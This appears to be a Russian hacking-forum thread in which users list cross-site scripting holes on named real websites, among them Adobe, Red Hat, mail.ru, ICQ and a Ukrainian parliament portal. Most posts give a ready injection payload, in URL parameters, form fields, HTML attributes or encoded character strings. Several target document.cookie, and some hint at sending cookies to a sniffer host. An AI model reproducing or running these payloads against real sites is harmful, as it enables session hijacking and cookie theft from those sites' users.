|
Цитата:
Пример запроса в поле: Цитата:
|
Код:
http://musicscope.ru/content/led-zeppelin-%D1%81%D0%BD%D0%BE%D0%B2%D0%B0-%D0%B2%D0%BC%D0%B5%D1%81%D1%82%D0%B5%3FКод:
"><script>alert('xss')</script> |
Цитата:
Пример запроса: Цитата:
Пример можно посмотреть здесь: Цитата:
|
http://robotraff.com/userpanel/selltraff.php
Уязвимы все поля Результат - http://robotraff.com/userpanel/stats.php?thread=136 |
http://www.bolero.ru//index.php?level=5&stype=quick&topic=0&cur_topic=0& cur_fquery=%3Cscript%3Ealert%28%5C%27xss%5C%27%29% 3C%2Fscript%3E&sclass=all&cat=0&fquery=%22%3E%3Csc ript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&cat=0&x =0&y=0
http://4pda.ru/sr.php?query=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E |
Активная XSS на infostore.org
На момент описания уязвимости, на infostore Администрацией были приняты меры, и включена привязка к IP адресу. .................................................. ....................... Уязвимость существует из-за недостаточной фильтрации входных данных в поле "текст:" при добавлении новости пользователем, и в личных сообщениях. В поле "текст:" пишем следующие: Код:
<img src="a"onError=javascript:alert('XSS');>Код:
<a href="javascript:String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,60,47,115,99,114,105,112,116,62)">XSS</a>______________________________________________ ***************************************** |
Цитата:
|
Цитата:
|
icq.com
все прошлые прикрыли, но: опять в блоге, и опять уязвимо поле "Image web address:" "onmouseover="alert('xss')" все символы не фильтруются и кол-во не ограниченно |
Цитата:
|
Цитата:
|
Цитата:
Цитата:
|
Цитата:
|
cyberfight.ru популярный ресурс - 7000-8000 хостов в день.
пример: Цитата:
|
Цитата:
Код:
http://www.cyberfight.ru/info/search/?qry=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&Search.x=0&Search.y=0 |
пассивные я тоже находил, но эта тема называется активные xss ;)
|
http://livechat.boldchat.com/aid/6278237534205176796/bc.chat
active XSS в поле your name |
Paradox Security Systems
Код:
http://paradox-security.ru/index.php?action=%22%3E%3Cscript%3Ealert(%22XSS%20BY%20Fugitif%22)%3C/script%3Eedit: Blogus.ru Код:
http://www.blogus.ru/tagposts.aspx?id=%22%3E%3Cscript%3Ealert(%22XSS%20BY%20Fugitif%22)%3C/script%3Eedit: Moto.ru Код:
http://www.moto.ru/ubbthreads/showprofile.php?Cat=%22%3E%3Cscript%3Ealert(%22XSS%20BY%20Fugitif%22)%3C/script%3E |
Fugitif, и где там активность????
_http://job.properm.ru/ _http://auto.properm.ru/ Заполняем вакансию, резюме, объявление, и в поле ФИО пишем Код:
Иванов Иван <script>alert(/ xss /)</script>Добавить адресата - в каментах Код:
<script>alert(/ GraBBerZ.com /)</script> |
mail.ru
в блогах пишем сообщение, там можно использовать разные теги, например имейдж <img src="адрес_снифера"> так все прекрасно работает, но куки не отошлешь тк стоит фильтрация "+", я как ни старался не обошел ее. зы пользуясь случаем хочу передать привет админам мейла. |
xss
netprint.ru
Регистрируемся, создаем альбом с любым именем и грузим фотографию, которую переименовываем в <script>alert()</script> Укладываемся в 40 символов. |
ЛЕНТА - сеть гипермаркетов
Код:
http://www.lenta.com/index.php?path=node/191&searchword="><script>alert('XSS')</script> |
Цитата:
|
Разобрался
|
http://nsti.ru/guest/
Гостевая книга Добавляем во все формы: "onmouseover="alert('xss')" |
Код:
www.miem.edu.ruКод:
http://www.econ.msu.ru/Код:
http://www.rapway.com.ru/Код:
www.saletime.bizКод:
http://livemy.infoКод:
http://blog.inf.byЧе-то пост разросся =) |
Верховная Рада Украины =)
Код:
http://portal.rada.gov.ua |
Adobe.com
регимся здесь Код:
https://www.adobe.com/cfusion/membership/index.cfm?nf=1&loc=en%5Fus<script>alert(12121)</script> кроме e-mail, password, zip-code... заходим в свой аккаунт и видим активную XSS... Можно предположить, что админ сможет просмотреть аккаунт пользователя, а заодно и отправить куки на снифф :) |
http://www.pcgames.lt
Уязвимые поля при регистрации:Nick,Vardas,Pavardė |
www.omen.ru
Уязвимые поля при регистрации:Имя,О себе кратко, О себе подробно, возможно еще множество полей, дальше проверять не стал, ибо смысла не вижу =) P.S. Сорри за 2ой пост =) |
это в пассивные xss
|
www.fanat.com.ua
Украинские фанаты футбола Код:
http://www.fanat.com.ua/cgi-bin/search.cgi?q=%22%3E%3Cscript%3Ealert(achat)%3C/script%3E%3C%22 |
Цитата:
2. Сообщение в алерте нуждается в одинарных кавычках. |
это тоже пассивная. люди, читайте статьи и разбирайтесь что в какую тему писать
|
http://www.rabotnitsa.ru/guestbook.php
сайт журнала работница уязвимые поля емейл, автор |
Форум сертифицированных специалистов :)
http://www.certification.ru В добавляемое сообщение вставляем: Цитата:
|
REDHAT
Код:
https://www.redhat.com/wapps/sso/rhn/login.html?redirect=%22%3E%3Cscript%3Ealert(%22XSS%20by%20Fugitif%22)%3C/script%3ESWISS CARD Код:
http://www.swisscard.ch/d/stellen/stellen_detail.php?oid=%22%3E%3Cscript%3Ealert(%22XSS%20by%20Fugitif%22)%3C/script%3EAND PAYPAL SUCKS Код:
http://www.paypalsucks.com/forums/showthread.php?fid=17&tid=6209&old_block=0&block=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E:p EDIT: here is wrong place...sorry ppl |
libra.kiev.ua/list_lyr.php?show_id=6578&page=1
в поле эмайл вводим '"><script>alert('Хss')</script> |
http://playboy.com.ru/stat/se.php
активная ксс на официальном российском сайте суперпопулярного плейбоя описание тут: https://forum.antichat.ru/thread55136.html |
http://www.babki.net/search.php
в поисковике товаров введите <script>alert('Mike 007 rulezz :D')</script> |
| Время: 00:42 |